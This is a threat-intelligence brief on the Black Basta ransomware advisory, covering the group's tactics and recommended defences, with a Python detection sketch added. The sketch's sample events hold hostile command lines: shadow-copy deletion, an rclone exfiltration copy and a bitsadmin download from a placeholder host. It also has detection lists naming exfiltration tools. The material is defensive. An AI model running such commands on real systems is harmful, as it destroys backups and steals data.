2024-05-23

Black Basta Ransomware Threatens Critical Infrastructure and Healthcare

Level: Tactical  |  Source: CISA & HHS  |  Global


Active since April 2022 and responsible for over 500 victims as of May 2024, the Black Basta ransomware gang poses a severe threat to organizations worldwide. In a joint #StopRansomware advisory, the Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), Department of Health and Human Services (HHS), and Multi-State Information Sharing and Analysis Center (MS-ISAC) have raised alarms about the group. The ransomware has caused damage across multiple sectors since its emergence: the gang's affiliates have targeted organizations in at least 12 of the 16 critical infrastructure sectors. The advisory particularly stresses the risk to the healthcare sector because of its dependency on technology and the potential for severe disruptions to patient care. Operationally, Black Basta employs a double-extortion model, giving victims a short window to pay the ransom, typically 10 to 12 days, before their data is published on the group's Tor leak site, Basta News. The combination of operational disruption and theft of critical data is what makes the group so dangerous.

Understanding the technical details of Black Basta's operations is crucial, and the joint advisory consolidates the known tactics and techniques used by the gang. Initial access is typically gained through spearphishing and exploitation of known vulnerabilities. In particular, affiliates have exploited the ConnectWise ScreenConnect vulnerability (CVE-2024-1709), which CISA added to its Known Exploited Vulnerabilities Catalog in February 2024. During the discovery and execution phase, Black Basta affiliates use tools such as the SoftPerfect network scanner and conduct reconnaissance for open ports and services to exploit. Lateral movement relies on exploiting any exposed services and on tools such as BITSAdmin, PsExec, and Remote Desktop Protocol (RDP). Privilege escalation often involves credential-dumping tools like Mimikatz and exploitation of vulnerabilities such as ZeroLogon (CVE-2020-1472) and PrintNightmare (CVE-2021-34527), along with other Windows Active Directory privilege escalation flaws such as sAMAccountName Spoofing (CVE-2021-42278) and Domain Controller Impersonation (CVE-2021-42287).

In the final stages of an attack, Black Basta affiliates use WinSCP or RClone for data exfiltration and disable antivirus products via PowerShell before encrypting files with the ChaCha20 algorithm and an RSA-4096 public key. Encrypted files receive the .basta file extension. The affiliates also use vssadmin.exe to delete volume shadow copies, further complicating recovery. To defend against such threats, CISA recommends that organizations keep systems updated, implement phishing-resistant Multi-Factor Authentication (MFA), and train users to recognize phishing attempts. Securing remote access software, making regular backups, and following the recommendations in the StopRansomware Guide are also critical steps. Healthcare organizations, given their particular exposure, should prioritize these defenses to mitigate the risk posed by ransomware gangs like Black Basta.
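As an added illustration (not code from the advisory or from Anvilogic), the following Python sketch turns the host-level artifacts described above, shadow copy deletion via vssadmin.exe, exfiltration tools, lateral movement tools and the .basta extension, into detection logic run over constructed Sysmon-style process-creation and file-create events. The event field names follow Sysmon's schema; the tool lists, the burst threshold and the severities are assumptions for the example, not values from the advisory.

```python
import re
from collections import Counter

# Constructed Sysmon-style events (not real telemetry): EventID 1 = process
# creation, EventID 11 = file create. Field names follow Sysmon's schema.
SAMPLE_EVENTS = [
    {"EventID": 1, "Computer": "WS01", "Image": r"C:\Windows\System32\vssadmin.exe",
     "CommandLine": "vssadmin.exe delete shadows /all /quiet"},
    {"EventID": 1, "Computer": "WS01", "Image": r"C:\Tools\rclone.exe",
     "CommandLine": "rclone.exe copy D:\\Finance remote:bucket -q"},
    {"EventID": 1, "Computer": "WS02", "Image": r"C:\Windows\System32\bitsadmin.exe",
     "CommandLine": "bitsadmin /transfer j /download http://example.invalid/a.bin C:\\Users\\Public\\a.bin"},
    {"EventID": 11, "Computer": "WS01", "TargetFilename": r"D:\Finance\q1.xlsx.basta"},
    {"EventID": 11, "Computer": "WS01", "TargetFilename": r"D:\Finance\q2.xlsx.basta"},
    {"EventID": 11, "Computer": "WS03", "TargetFilename": r"C:\Users\a\report.docx"},
]

# Tool names map to the advisory's stages: exfiltration (WinSCP/RClone) and
# lateral movement (BITSAdmin/PsExec). Shadow-copy deletion is a command-line match.
SHADOW_DELETE = re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows", re.I)
EXFIL_TOOLS = {"rclone.exe", "winscp.exe"}
LATERAL_TOOLS = {"bitsadmin.exe", "psexec.exe", "psexec64.exe"}

def classify_process(ev):
    """Return (finding, severity) for one process-creation event, or None."""
    exe = ev.get("Image", "").rsplit("\\", 1)[-1].lower()
    if SHADOW_DELETE.search(ev.get("CommandLine", "")):
        return ("shadow_copy_deletion", "high")
    if exe in EXFIL_TOOLS:
        return ("exfiltration_tool", "medium")
    if exe in LATERAL_TOOLS:
        return ("lateral_movement_tool", "medium")
    return None

def analyze(events, basta_threshold=2):
    """Return [(computer, finding, severity)]. Process events match individually;
    .basta creations are counted per host, since one rename is noise but a burst is encryption."""
    findings, basta_counts = [], Counter()
    for ev in events:
        if ev["EventID"] == 1:
            hit = classify_process(ev)
            if hit:
                findings.append((ev["Computer"], *hit))
        elif ev["EventID"] == 11 and ev.get("TargetFilename", "").lower().endswith(".basta"):
            basta_counts[ev["Computer"]] += 1
    for host, n in basta_counts.items():
        if n >= basta_threshold:
            findings.append((host, "basta_extension_burst", "critical"))
    return findings
```

Calling analyze(SAMPLE_EVENTS) flags WS01 for shadow copy deletion, RClone use and a .basta burst, and WS02 for BITSAdmin, while the lone .docx write on WS03 produces nothing.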

Concerns over Black Basta's activity against healthcare organizations were heightened by the recent cyberattack on the Ascension healthcare network, whose operational disruptions have been attributed to the Black Basta ransomware gang. The group's potential relationships with other prolific cybercrime groups, including the former Conti and BlackMatter ransomware gangs and the threat group FIN7, further underscore the severity of the threat.
